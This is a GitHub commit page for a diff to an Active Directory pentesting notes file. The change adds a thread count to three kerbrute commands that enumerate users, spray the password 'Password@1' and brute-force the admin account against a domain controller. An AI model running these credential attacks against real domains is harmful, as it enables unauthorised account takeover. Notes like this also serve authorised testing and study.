Skip to content

Commit

Permalink
Update ActiveDirectory.md
Browse files Browse the repository at this point in the history
  • Loading branch information
ZishanAdThandar authored Nov 9, 2024
1 parent 013d1e9 commit 331dc28
Showing 1 changed file with 3 additions and 3 deletions.
6 changes: 3 additions & 3 deletions notes/ActiveDirectory.md
Original file line number Diff line number Diff line change
Expand Up @@ -265,9 +265,9 @@ Repo: https://github.com/ropnop/kerbrute

Notes: https://www.hackingarticles.in/a-detailed-guide-on-kerbrute/
```bash
kerbrute userenum --dc 192.168.1.19 -d domain.tld users.txt #userenum
kerbrute passwordspray --dc 192.168.1.19 -d domain.tld users.txt Password@1 #user bruteforce with known password
kerbrute bruteuser --dc 192.168.1.19 -d domain.tld password.txt admin #password bruteforce with known username
kerbrute userenum -t 250 --dc 192.168.1.19 -d domain.tld users.txt #userenum
kerbrute passwordspray -t 250 --dc 192.168.1.19 -d domain.tld users.txt Password@1 #user bruteforce with known password
kerbrute bruteuser -t 250 --dc 192.168.1.19 -d domain.tld password.txt admin #password bruteforce with known username
```

## KrbRelayUp
Expand Down

0 comments on commit 331dc28

Please sign in to comment.